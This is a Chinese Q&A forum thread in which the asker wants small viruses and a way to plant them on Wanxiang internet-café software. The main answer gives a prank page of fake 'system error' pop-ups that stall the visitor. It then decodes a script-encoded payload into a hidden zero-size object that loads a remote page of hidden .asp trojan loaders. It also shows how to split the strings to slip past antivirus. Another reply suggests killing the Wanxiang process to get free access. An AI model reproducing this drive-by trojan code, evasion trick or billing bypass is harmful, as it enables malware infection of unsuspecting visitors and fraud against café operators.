本人求一些小病毒。在说下,怎么和万象上挂病毒。请高手指点。。来个说明白点的。。。谢谢
- 提问者网友:心如荒岛囚我终老
- 2021-04-12 02:49
- 五星知识达人网友:十鸦
- 2021-04-12 04:01
<head><meta content="text/html; charset=gb2312" http-equiv=Content-Type><meta content="Microsoft FrontPage 4.0" name=GENERATOR><LINK href="../../images/main.css" rel=stylesheet><title>整人</title>
<style fprolloverstyle>A:hover {color: #FF0000}
</style>
<script language=javascript>
step=0
function flash_title()
{
step++
if (step==3) {step=1}
if (step==1) {document.title='☆★<a href=' http://kev.369.com' target=_blank> http://kev.369.com</a>☆★→<a href=' http://kev.369.com' target=_blank> http://kev.369.com</a> '}
if (step==2) {document.title='★☆<a href=' http://kev.369.com' target=_blank> http://kev.369.com</a>★☆→<a href=' http://kev.369.com' target=_blank> http://kev.369.com</a> '}
setTimeout("flash_title()",200);
}
flash_title() </script>
<script LANGUAGE="javascript">
<!--
vers = navigator.appVersion;
vers = parseFloat(vers.substring(vers.lastIndexOf(".")-1,vers.length));
var c=1;
defaultStatus="<a href=' http://kev.369.com' target=_blank> http://kev.369.com</a> ; 如果你喜欢本站,别忘了把本站的网址告诉给你QQ上的朋友哦!谢谢您!"
function bookmark() {
window.external.AddFavorite('<a href=' http://kev.369.com'' target=_blank> http://kev.369.com'</a>, '我爱你');
}
//-->
</script>
</HEAD>
<BODY bgcolor="#CCFFCC" text="#006600" link="#0000FF" vlink="#0000FF" alink="#0000FF">
<script language=javascript><!--// Hide the javascript from older browsers (window.alert(" 18岁以下禁止进入,请按确定")) // End hiding of script // --></script> <script language=javascript><!--
// Hide the javascript from older browsers
(window.alert(" 你的系统严重出错!请关闭其他窗口! "))
// End hiding of script
// --></script> <script language=javascript><!--
// Hide the javascript from older browsers
(window.alert(" 你的系统严重出错!请关闭其他窗口! "))
// End hiding of script
// --></script> <script language=javascript><!--
// Hide the javascript from older browsers
(window.alert(" 你的系统严重出错!请关闭其他窗口! "))
// End hiding of script
// --></script> ……
(中间省略N多象上面一样的弹出窗口废话)
…… <script language=javascript>
<!-- Hide the javascript from older browsers
(window.alert("因为你还有可能碰到类似的网页喔!"))
// End hiding of script -->
</script> <script language=javascript><!--
// Hide the javascript from older browsers
(window.alert("你仔细想一想...不觉得有趣吗??"))
// End hiding of script
// --></script> <script language=javascript><!--
// Hide the javascript from older browsers
(window.alert("好吧~我对不起你~你生命可以继续啦!!"))
// End hiding of script
// --></script>
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" width="750">
<tr>
<td height="20"></td>
<td height="20"></td>
<td height="20">
<p></td>
<td height="20"></td>
</tr>
<tr>
<td width="9%"></td>
<td width="41%"></td>
<td width="43%">
<p align="right"><font color="#339966"> <b><<< </b><script language="javascript" src="../../favor.js"></script></font><b><font color="#339966">>>> </font></b></td>
<td width="7%"></td>
</tr>
<tr>
<td width="100%" colspan="4">
<p align="center"><font size="6">哈哈,过瘾吧?</font> </p>
<P align=center><FONT color=#339966 face=Wingdings
size=7>ABCDEFGHIMN<BR>&*(</FONT></P>
<p align="center"><font size="4" face="Arial"><b>HeHe......Just a joke!</b></font></p>
<p align="center"><font size="4" face="Arial"><b>Have FUN......</b></font></p>
<p align="center"> </td>
</tr>
</table>
</center>
</div>
</BODY>
哇好多弹出窗口啊?其实后面你就知道了,这其实不过是让他给你种木马争取时间:)黑吧!!
上面的代码其实有一小段代码十分可疑!应该大家也注意了。就是: <script language="Jscript.Encode">#@~^8gAAAA==@#@&@!Z O,@#@&7lM~KD[/{JYf;W4NnmDPNmOC]2fu +tOOa]fbJ&tK:n bYN.2cmG:JV\%Hzs:R4Yss]y ~hkL4D]>PSkND4Y&GPZ]f2Yf;zG4NnmD]f3r@&0;U1YrW ~U+Og+SWMNkc#@& -lMPHnSWM[/p1+S GD9/{EU+d^mwn`qGD9/bI9Wm;hxORS.bYnv1hKD9d#p8@&?YHnSWM[/v#i@&&&P [/QUOTE">O@*@&IUsAAA==^#~@</script>
很明显代码被微软的脚本编码器( SCRENC.EXE )加密过!简单介绍一下,微软的脚本编码器( SCRENC.EXE )是微软提供的可以对ASP脚本源码进行编码加密的一个工具。应用开发商通过使用这个工具,达到 Web 主机和 Web 客户不能查看或修改它们的源代码。具体信息可以查看中国暗域网络相关技术文章,这里就不说废话了!现在开始解密……
把秘密议文拷贝到一个TXT文件中,重命名为source.txt。然后找到ZwdEcode所在的目录,输入
D:\Tools>zwdecode
Decoder for Microsoft script v6.2
?2001 MrZhengwei , <a href="mailto:zhengei@263.net">zhengei@263.net</a> TEL:013001865430
Home page: <a href=' http://www.zhengwei.net/prg/zwdecode.htm' target=_blank> http://www.zhengwei.net/prg/zwdecode.htm ; Usage: zwdecode <infile> <outfile> zwdecode source.txt hackway.txt
软件zwdecode下载地址:中国暗域网络技术下载系统
现在去同目录下看,可以找到hackway.txt,其中就是解密后的明文。使用ZWD轻易破解后的明文如下:
<script language="Jscript.Encode">
<!--
var Words="%3Cobject data%3D%22http%3A//home.itdrp.com/kevjy/mm.html%22 weight%3D0 width%3D 0%3E%3C/object%3E"
function SetNewWords()
{var NewWords;NewWords=unescape(Words);document.write(NewWords);}
SetNewWords();
// -->
</script>
看见了破解后的明文,可以分析这里是个重点
http%3A//home.itdrp.com/kevjy/mm.html
%3A是编码后的内容,翻译过来就是t。那么我们现在清楚了,原来开始的时候还插入了一个mm.html页!
好!再去这里看看: http://home.itdrp.com/kevjy/mm.html
竟然是张白页?晕……而且无法查看源代码,点了“查看源文件”竟然没反应,连输入view-source都不可以,只好把它强行下载回来研究了。
一下回来竟然被杀毒软件杀掉了,看来这个页面最有问题了。关闭杀毒软件时实监控,再下一次。
OK!现在我们可以看见mm.html的内容如下:
前面的代码是这样的(被杀毒软件认成病毒的就是这里了,后面的无毒就不说了,我懒……):
<html>
<body>
<object data="lhxyexe.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyhta.asp" weight=0 width= 0 height="14"></object>
<object data="20cn.asp" weight=0 width= 0 height="14"></object>
<object data="qqkev.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyexe1.asp" weight=0 width= 0 height="14"></object>
<object data="lhxyhta1.asp" weight=0 width= 0 height="14"></object>
<object data="i"+"e.asp" weight=0 width= 0 height="14"></object>
</body>
</html>
(以上的代码会被杀毒软件认成病毒,如果想保存此文章,请把上面的代码转换成下面的代码,书写方式变化而已) <html>
<body>
<object data="lhxy"+"exe.asp" weight=0 width= 0 height="14"></object>
<object data="lhxy"+"hta.asp" weight=0 width= 0 height="14"></object>
<object data="20"+"cn.asp" weight=0 width= 0 height="14"></object>
<object data="qqk"+"ev.asp" weight=0 width= 0 height="14"></object>
<object data="lhx"+"yexe1.asp" weight=0 width= 0 height="14"></object>
<object data="lhxy"+"hta1.asp" weight=0 width= 0 height="14"></object>
<object data="i"+"e.asp" weight=0 width= 0 height="14"></object>
</body>
</html>
_____________________________________________
本病毒使用javascrip编译仅供测试使用请勿做违法之事,发生严重后果本人概不负责
- 1楼网友:怙棘
- 2021-04-12 05:44
你是不是要免费上网?
是的话我可以帮助你噢,
结束万象活动进程。这样就免费了,,
- 2楼网友:第四晚心情
- 2021-04-12 04:53